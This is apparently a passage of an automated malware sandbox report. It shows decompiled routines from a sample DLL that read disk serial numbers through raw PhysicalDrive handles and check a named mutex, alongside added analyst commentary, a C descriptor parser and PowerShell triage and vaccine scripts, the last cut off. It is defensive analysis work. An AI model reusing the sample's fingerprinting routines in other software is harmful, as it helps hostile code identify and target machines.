                                                                                                                                                					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                					_t71 = _t71 + 0xc;
                                                                                                                                                					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
                                                                                                                                                					if(_v16 == 0xffffffff) {
                                                                                                                                                						L10:
                                                                                                                                                						_v8 =  &(_v8->Internal);
                                                                                                                                                						_v552 = _v8;
                                                                                                                                                						if(_v8 < 4) {
                                                                                                                                                							continue;
                                                                                                                                                						}
                                                                                                                                                						return _v12;
                                                                                                                                                					}
                                                                                                                                                					_v548 = 0;
                                                                                                                                                					_v536 = 0;
                                                                                                                                                					_v544 = 0;
                                                                                                                                                					_v540 = 0;
                                                                                                                                                					E1000CF20(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                					_t71 = _t71 + 0xc;
                                                                                                                                                					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
                                                                                                                                                						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                						E1001D040(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
                                                                                                                                                						_t71 = _t71 + 0x24;
                                                                                                                                                						if(_t56 == 0) {
                                                                                                                                                							_v12 = 1;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					CloseHandle(_v16);
                                                                                                                                                					if(_v12 == 0) {
                                                                                                                                                						_v8 = _v552;
                                                                                                                                                						goto L10;
                                                                                                                                                					} else {
                                                                                                                                                						return _v12;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				goto L13;
                                                                                                                                                			}

                                                                                                                                                0x1001da70
                                                                                                                                                0x1001da78
                                                                                                                                                0x1001da81
                                                                                                                                                0x1001dbf0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbf0
                                                                                                                                                0x1001da87
                                                                                                                                                0x1001da8e
                                                                                                                                                0x1001da95
                                                                                                                                                0x1001da9f
                                                                                                                                                0x1001dabc
                                                                                                                                                0x1001dac2
                                                                                                                                                0x1001dade
                                                                                                                                                0x1001dae5
                                                                                                                                                0x1001dbce
                                                                                                                                                0x1001dbd4
                                                                                                                                                0x1001dbda
                                                                                                                                                0x1001dbe4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbeb
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbe6
                                                                                                                                                0x1001daeb
                                                                                                                                                0x1001daf5
                                                                                                                                                0x1001daff
                                                                                                                                                0x1001db09
                                                                                                                                                0x1001db21
                                                                                                                                                0x1001db26
                                                                                                                                                0x1001db58
                                                                                                                                                0x1001db68
                                                                                                                                                0x1001db85
                                                                                                                                                0x1001db9d
                                                                                                                                                0x1001dba2
                                                                                                                                                0x1001dba7
                                                                                                                                                0x1001dba9
                                                                                                                                                0x1001dba9
                                                                                                                                                0x1001dba7
                                                                                                                                                0x1001dbb4
                                                                                                                                                0x1001dbbe
                                                                                                                                                0x1001dbcb
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbc0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbc0
                                                                                                                                                0x1001dbbe
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 1858725146-2935326385
                                                                                                                                                • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
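What E1001DA70 above does, read from the decompiled lines: it loops over \\.\PhysicalDrive0 through PhysicalDrive3 (the counter is compared against 4), opens each with desired access 0, share mode 3 (FILE_SHARE_READ|FILE_SHARE_WRITE) and OPEN_EXISTING, and calls DeviceIoControl with control code 0x2d1400, a zeroed 12-byte input (_v544, _v540, _v536) and a 0x2710-byte output buffer (_v10556). 0x2d1400 is IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2d, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS); the zeroed 12-byte input is a STORAGE_PROPERTY_QUERY for StorageDeviceProperty with PropertyStandardQuery, and the output is a STORAGE_DEVICE_DESCRIPTOR. _v10532 lies 24 bytes into that output buffer, which is the SerialNumberOffset field, so E1001D040 resolves the disk's serial number string into the 0x104-byte buffer _v11556, and E1001CFA0 then either compares that string with, or copies it into, the caller's _a4 (the body of E1001CFA0 is not shown); the routine returns 1 as soon as that call returns 0 and stops enumerating. The report does not show what _a4 holds, so nothing here says which serial the sample is interested in. Note that E1001D370 below opens the same device names with 0xc0000000 (GENERIC_READ|GENERIC_WRITE) and share mode 7 instead; its body is cut off in this section.

The program below is an added worked example, not code from the sample or from this report. It decodes the control code, parses a constructed STORAGE_DEVICE_DESCRIPTOR (the product and serial strings are made up) with bounds checks on the driver-supplied offsets, and performs the serial comparison that E1001CFA0 is read as here. The struct names spq and sdd, all function names and the sample strings are mine; the field layouts follow the Win32 SDK definitions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE packs DeviceType<<16 | RequiredAccess<<14 | Function<<2 | Method, so the
 * 0x2d1400 passed to DeviceIoControl decodes to IOCTL_STORAGE_BASE (0x2d), function
 * 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS: IOCTL_STORAGE_QUERY_PROPERTY. */
struct ctl_fields { uint32_t device_type, access, function, method; };

static struct ctl_fields decode_ctl_code(uint32_t c) {
    struct ctl_fields f = { (c >> 16) & 0xffffu, (c >> 14) & 3u, (c >> 2) & 0xfffu, c & 3u };
    return f;
}

/* SDK layouts of the input and output structures, redeclared under local names
 * (spq, sdd) so this builds without windows.h. */
struct spq {                 /* STORAGE_PROPERTY_QUERY, the 12-byte (0xc) input */
    uint32_t property_id;    /* 0 = StorageDeviceProperty, as the sample passes */
    uint32_t query_type;     /* 0 = PropertyStandardQuery */
    uint8_t  additional[1];  /* alignment pads the struct to 12 bytes */
};
struct sdd {                 /* STORAGE_DEVICE_DESCRIPTOR header of the output */
    uint32_t version, size;
    uint8_t  device_type, device_type_modifier, removable_media, command_queueing;
    uint32_t vendor_id_offset, product_id_offset, product_revision_offset;
    uint32_t serial_number_offset;   /* byte 24: the field the sample reads as _v10532 */
    uint32_t bus_type, raw_properties_length;
    uint8_t  raw_device_properties[1];
};

/* Copy the NUL-terminated string `off` bytes into `buf` to `out`. The offset is
 * driver-supplied, so every read is bounded. Returns the string length, 0 when the
 * field is absent (offset 0) and -1 when the offset lies outside the buffer. */
static int descriptor_string(const uint8_t *buf, size_t buf_len, uint32_t off,
                             char *out, size_t out_len) {
    size_t n = 0;
    if (out_len == 0) return -1;
    out[0] = '\0';
    if (off == 0) return 0;
    if (off >= buf_len) return -1;
    for (; off + n < buf_len && buf[off + n] != '\0' && n + 1 < out_len; n++)
        out[n] = (char)buf[off + n];
    out[n] = '\0';
    return (int)n;
}

/* Read SerialNumberOffset from the header and resolve it: the work done by the
 * decompiled E1001D040(_v10532, &_v10556, &_v11556) step. */
static int extract_serial(const uint8_t *buf, size_t buf_len, char *out, size_t out_len) {
    uint32_t off;
    if (buf_len < offsetof(struct sdd, bus_type)) return -1;   /* header cut short */
    memcpy(&off, buf + offsetof(struct sdd, serial_number_offset), sizeof off);
    return descriptor_string(buf, buf_len, off, out, out_len);
}

/* Constructed descriptor for offline use; the product and serial strings are
 * made-up values, not taken from any real disk or from the report. */
static size_t build_sample_descriptor(uint8_t *buf, size_t buf_len) {
    static const char product[] = "EXAMPLE HARDDISK", serial[] = "EX0123456789";
    struct sdd hdr;
    size_t pos = sizeof hdr;                  /* strings follow the fixed header */
    if (buf_len < pos + sizeof product + sizeof serial) return 0;
    memset(&hdr, 0, sizeof hdr);
    memset(buf, 0, buf_len);
    hdr.version = (uint32_t)sizeof hdr;
    hdr.product_id_offset = (uint32_t)pos;
    memcpy(buf + pos, product, sizeof product);
    pos += sizeof product;
    hdr.serial_number_offset = (uint32_t)pos;
    memcpy(buf + pos, serial, sizeof serial);
    pos += sizeof serial;
    hdr.size = (uint32_t)pos;
    memcpy(buf, &hdr, sizeof hdr);
    return pos;
}

/* Mirror of the sample's last step (E1001CFA0 on _v11556 and _a4), read here as a
 * comparison: 1 if the constructed descriptor's serial equals `expected`. */
static int sample_serial_matches(const char *expected) {
    uint8_t buf[0x2710];                      /* same 10000-byte output size */
    char s[0x104];                            /* same 260-byte scratch size as _v11556 */
    size_t n = build_sample_descriptor(buf, sizeof buf);
    return n != 0 && extract_serial(buf, n, s, sizeof s) > 0 && strcmp(s, expected) == 0;
}

int main(void) {
    struct ctl_fields f = decode_ctl_code(0x2d1400);
    printf("0x2d1400: type 0x%x function 0x%x method %u access %u\n",
           f.device_type, f.function, f.method, f.access);
    printf("constructed serial matches: %d\n", sample_serial_matches("EX0123456789"));
    return 0;
}
```

On a Windows host the same parser can be fed a real buffer: open the device exactly as the sample does, CreateFileW(L"\\\\.\\PhysicalDrive0", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL), then DeviceIoControl(h, 0x2d1400, &q, sizeof q, out, sizeof out, &ret, NULL) with a zeroed struct spq q, and pass out and ret to extract_serial. Desired access 0 is enough for this query, which is why the routine can read the disk serial without any read or write right to the disk; the GENERIC_READ|GENERIC_WRITE open in E1001D370 is the one to watch for writes.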

                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				struct _OVERLAPPED* _v12;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				void* _v24;
                                                                                                                                                				short _v540;
                                                                                                                                                				char _v1564;
                                                                                                                                                				long _v1568;
                                                                                                                                                				long _v1572;
                                                                                                                                                				intOrPtr _v1576;
                                                                                                                                                				struct _OVERLAPPED* _v1580;
                                                                                                                                                				struct _OVERLAPPED* _v1584;
                                                                                                                                                				struct _OVERLAPPED* _v1588;
                                                                                                                                                				struct _OVERLAPPED* _v1592;
                                                                                                                                                				struct _OVERLAPPED* _v1596;
                                                                                                                                                				struct _OVERLAPPED* _v1600;
                                                                                                                                                				struct _OVERLAPPED* _v1604;
                                                                                                                                                				void _v1608;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				int _t63;
                                                                                                                                                				void* _t64;
                                                                                                                                                				int _t76;
                                                                                                                                                				void* _t77;
                                                                                                                                                				void* _t96;
                                                                                                                                                				void* _t97;
                                                                                                                                                				void* _t98;
                                                                                                                                                				void* _t99;
                                                                                                                                                				void* _t100;
                                                                                                                                                
                                                                                                                                                				_t97 = __esi;
                                                                                                                                                				_t96 = __edi;
                                                                                                                                                				_t77 = __ebx;
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_v16 = _a4;
                                                                                                                                                				_v1584 = 0;
                                                                                                                                                				_v1580 = 0;
                                                                                                                                                				do {
                                                                                                                                                					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                					_t99 = _t99 + 0xc;
                                                                                                                                                					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                					if(_v24 != 0xffffffff) {
                                                                                                                                                						_v1572 = 0;
                                                                                                                                                						_v1608 = 0;
                                                                                                                                                						_v1604 = 0;
                                                                                                                                                						_v1600 = 0;
                                                                                                                                                						_v1596 = 0;
                                                                                                                                                						_v1592 = 0;
                                                                                                                                                						_v1588 = 0;
                                                                                                                                                						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                						__eflags = _t63;
                                                                                                                                                						if(_t63 != 0) {
                                                                                                                                                							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                							_t100 = _t99 + 4;
                                                                                                                                                							_v8 = _t64;
                                                                                                                                                							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                							_v1568 = 0;
                                                                                                                                                							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                								L10:
                                                                                                                                                								CloseHandle(_v24);
                                                                                                                                                								_push(_v8);
                                                                                                                                                								E1000CA30(_t77, _t96, _t97, __eflags);
                                                                                                                                                								_t99 = _t100 + 4;
                                                                                                                                                								__eflags = _v1584;
                                                                                                                                                								if(_v1584 == 0) {
                                                                                                                                                									_v12 = _v1580;
                                                                                                                                                									goto L13;
                                                                                                                                                								}
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							_v20 = 0;
                                                                                                                                                							do {
                                                                                                                                                								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                								_v20 = _v20 + 1;
                                                                                                                                                								__eflags = _v20 - 0x100;
                                                                                                                                                							} while (_v20 < 0x100);
                                                                                                                                                							_v1576 = E1001CD70( &_v1564);
                                                                                                                                                							_t76 = E1001CFA0(_v1576, 0x104, _v16);
                                                                                                                                                							_t100 = _t100 + 0x10;
                                                                                                                                                							__eflags = _t76;
                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                								_v1584 = 1;
                                                                                                                                                							}
                                                                                                                                                							goto L10;
                                                                                                                                                						}
                                                                                                                                                						goto L13;
                                                                                                                                                					}
                                                                                                                                                					L13:
                                                                                                                                                					_v12 =  &(_v12->Internal);
                                                                                                                                                					_v1580 = _v12;
                                                                                                                                                				} while (_v12 < 4);
                                                                                                                                                				return _v1584;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 3081802084-2935326385
                                                                                                                                                • Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                • Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                				void* _v804;
                                                                                                                                                				intOrPtr _v808;
                                                                                                                                                				intOrPtr _v812;
                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                				long _t17;
                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                				intOrPtr* _t31;
                                                                                                                                                				void* _t34;
                                                                                                                                                
                                                                                                                                                				_t27 = __esi;
                                                                                                                                                				_t26 = __edi;
                                                                                                                                                				_t25 = __edx;
                                                                                                                                                				_t22 = __ecx;
                                                                                                                                                				_t21 = __ebx;
                                                                                                                                                				_t6 = __eax;
                                                                                                                                                				_t34 = _t22 -  *0x103322d8; // 0xad297f5f
                                                                                                                                                				if(_t34 == 0) {
                                                                                                                                                					asm("repe ret");
                                                                                                                                                				}
				// Tail of the MSVC CRT __report_gsfailure (/GS stack-cookie failure handler): the CONTEXT
				// record lives at 0x103339a8 and the EXCEPTION_RECORD at 0x10333950 (field offsets below match).
				 *0x10333a58 = _t6;        // CONTEXT.Eax
				 *0x10333a54 = _t22;       // CONTEXT.Ecx
				 *0x10333a50 = _t25;       // CONTEXT.Edx
				 *0x10333a4c = _t21;       // CONTEXT.Ebx
				 *0x10333a48 = _t27;       // CONTEXT.Esi
				 *0x10333a44 = _t26;       // CONTEXT.Edi
				 *0x10333a70 = ss;         // CONTEXT.SegSs
				 *0x10333a64 = cs;         // CONTEXT.SegCs
				 *0x10333a40 = ds;         // CONTEXT.SegDs
				 *0x10333a3c = es;         // CONTEXT.SegEs
				 *0x10333a38 = fs;         // CONTEXT.SegFs
				 *0x10333a34 = gs;         // CONTEXT.SegGs
				asm("pushfd");
				_pop( *0x10333a68);        // CONTEXT.EFlags
				 *0x10333a5c =  *_t31;     // CONTEXT.Ebp (caller's saved frame pointer)
				 *0x10333a60 = _v0;        // CONTEXT.Eip (return address into the function whose cookie failed)
				 *0x10333a6c =  &_a4;      // CONTEXT.Esp
				 *0x103339a8 = 0x10001;    // CONTEXT.ContextFlags = CONTEXT_CONTROL
				_t11 =  *0x10333a60; // 0x0
				 *0x1033395c = _t11;       // EXCEPTION_RECORD.ExceptionAddress = Eip
				 *0x10333950 = 0xc0000409; // EXCEPTION_RECORD.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
				 *0x10333954 = 1;          // EXCEPTION_RECORD.ExceptionFlags = EXCEPTION_NONCONTINUABLE
				_t12 =  *0x103322d8; // 0xad297f5f   __security_cookie, copied into the frame for the crash dump
				_v812 = _t12;
				_t13 =  *0x103322dc; // 0x52d680a0   __security_cookie_complement (== ~0xad297f5f, so the global cookie itself was intact)
				_v808 = _t13;
				 *0x103339a0 = IsDebuggerPresent();   // CRT bookkeeping ("debugger was present"), not a sample-specific anti-debug check
				_push(1);
				E10013A5E(_t14);                       // debugger hook called with 1 (likely _crt_debugger_hook)
				SetUnhandledExceptionFilter(0);        // drop any user filter so the fabricated record cannot be swallowed
				_t17 = UnhandledExceptionFilter(0x10023b34);   // 0x10023b34: const EXCEPTION_POINTERS { &record, &context } in .rdata
				if( *0x103339a0 == 0) {
					_push(1);
					E10013A5E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);   // exit status STATUS_STACK_BUFFER_OVERRUN
			}

Instruction addresses: 0x1000effc-0x1000f004, 0x10016115-0x1001620f

                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
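The function above is not the sample's own anti-debugging code: it is the tail of the MSVC CRT's __report_gsfailure, the /GS stack-cookie failure handler. The giveaways are the fabricated EXCEPTION_RECORD with code 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN), the cookie and its complement copied into the frame (0x52D680A0 is the bitwise complement of 0xAD297F5F), SetUnhandledExceptionFilter(0) followed by UnhandledExceptionFilter on a constant EXCEPTION_POINTERS, and TerminateProcess with the same status. Its IsDebuggerPresent call therefore does not by itself support the report's anti-debugging signatures; E10019FF0 further down, which calls CheckRemoteDebuggerPresent, does. The following PowerShell is an added triage helper, not code from the sample or from the report: it reads "APIs" blocks in the format printed here and flags the ones matching this CRT fingerprint, so that the remaining IsDebuggerPresent hits are the ones worth reading. The first sample block is copied from this page; the second block and its addresses are constructed.

```powershell
# Added triage helper (not code from the sample or from this report). Decides whether a
# decompiled function's "APIs" block, in the format this report prints, is the MSVC CRT
# __report_gsfailure handler rather than a hand-written debugger check.
# Fingerprint: IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter,
# GetCurrentProcess and TerminateProcess all present, plus STATUS_STACK_BUFFER_OVERRUN
# (C0000409) among the arguments.

function Get-ApiNames {
    param([string]$ApiBlock)
    # Lines look like "• Name.MODULE(args), ref: ADDR"; the match skips the bullet and
    # takes the first Name.MODULE pair on each line.
    foreach ($line in ($ApiBlock -split "`r?`n")) {
        if ($line -match '(\w+)\.([A-Z0-9]+)\b') { $Matches[1] }
    }
}

function Test-GsFailureHandler {
    param([string]$ApiBlock)
    $names    = @(Get-ApiNames -ApiBlock $ApiBlock)
    $required = 'IsDebuggerPresent', 'SetUnhandledExceptionFilter', 'UnhandledExceptionFilter',
                'GetCurrentProcess', 'TerminateProcess'
    $missing  = @($required | Where-Object { $names -notcontains $_ })
    # The CRT clears any user filter (argument 0) right before raising its fabricated record.
    $clearsFilter = $ApiBlock -match 'SetUnhandledExceptionFilter\.\w+\(0+\)'
    $overrunCode  = $ApiBlock -match '\bC0000409\b'
    return ($missing.Count -eq 0 -and $clearsFilter -and $overrunCode)
}

# Sample 1: the "APIs" block of the function above, copied from this report.
$crtBlock = @'
• IsDebuggerPresent.KERNEL32 ref: 100161C5
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
• UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
• GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
• TerminateProcess.KERNEL32(00000000), ref: 10016208
'@

# Sample 2: a constructed block (made-up addresses) for a hand-rolled check that exits on detection.
$customBlock = @'
• IsDebuggerPresent.KERNEL32 ref: 10019FC0
• ExitProcess.KERNEL32(00000001), ref: 10019FD1
'@

$samples = [ordered]@{ 'report block' = $crtBlock; 'constructed block' = $customBlock }
foreach ($entry in $samples.GetEnumerator()) {
    $verdict = if (Test-GsFailureHandler -ApiBlock $entry.Value) {
        'CRT __report_gsfailure; discount its IsDebuggerPresent hit'
    } else {
        'not the CRT handler; review as a real debugger check'
    }
    '{0}: {1}' -f $entry.Key, $verdict
}
```

The three conditions are deliberately conjunctive: plenty of hand-written handlers call SetUnhandledExceptionFilter, and plenty of anti-debug code calls IsDebuggerPresent, but only the CRT handler combines both with the 0xC0000409 status passed to TerminateProcess.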

                                                                                                                                                C-Code - Quality: 100%
			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);        // SECURITY_DESCRIPTOR_REVISION
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);     // bDaclPresent=TRUE, pDacl=NULL: a NULL DACL grants everyone full access
				_v40.nLength = 0xc;                             // sizeof(SECURITY_ATTRIBUTES) on x86
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);            // bInitialOwner=FALSE; the name is the caller's string at 10020584 (not printed here)
				if(_v28 != 0 && GetLastError() == 0xb7) {       // ERROR_ALREADY_EXISTS: another instance created the mutex first
					_v44 = 1;
				}
				return _v44;                                    // 1 = already running; 0 = created now, or CreateMutexA returned NULL
			}

Instruction addresses: 0x1001a0f6-0x1001a167

                                                                                                                                                APIs
                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                • CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4085719312-0
                                                                                                                                                • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
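E1001A0F0 is a single-instance check: it creates a named mutex under a NULL-DACL security descriptor and returns 1 only when CreateMutexA returns a handle and GetLastError() is ERROR_ALREADY_EXISTS (0xB7). Two things follow for a responder. First, a NULL DACL means any account on the host can open the object, so the mutex can be probed from an unprivileged session. Second, a mutex pre-created under that name makes the check return 1; what the caller does with that result is not shown on this page, so treat the vaccine as a hypothesis to confirm in a sandbox. The script below is an added example for Windows PowerShell 5.1 (.NET Framework), not code from the sample or from the report. The mutex name is the string at 10020584, which this page does not print, so $MutexName is a placeholder; whether the real name carries a "Global\" prefix is also unknown, and an unprefixed name is session-local, so the vaccine has to run in the session the sample would run in.

```powershell
# Added example, not code from the sample or from this report. Targets Windows PowerShell 5.1
# (.NET Framework), where the Mutex constructor and OpenExisting overloads that take security
# objects live in mscorlib. $MutexName is a placeholder: the real name is the string at
# 10020584 in the dump and is not printed on this page.
param(
    [string]$MutexName = 'PLACEHOLDER_MUTEX_NAME',
    [switch]$Vaccinate
)

function Test-SampleMutex {
    param([string]$Name)
    try {
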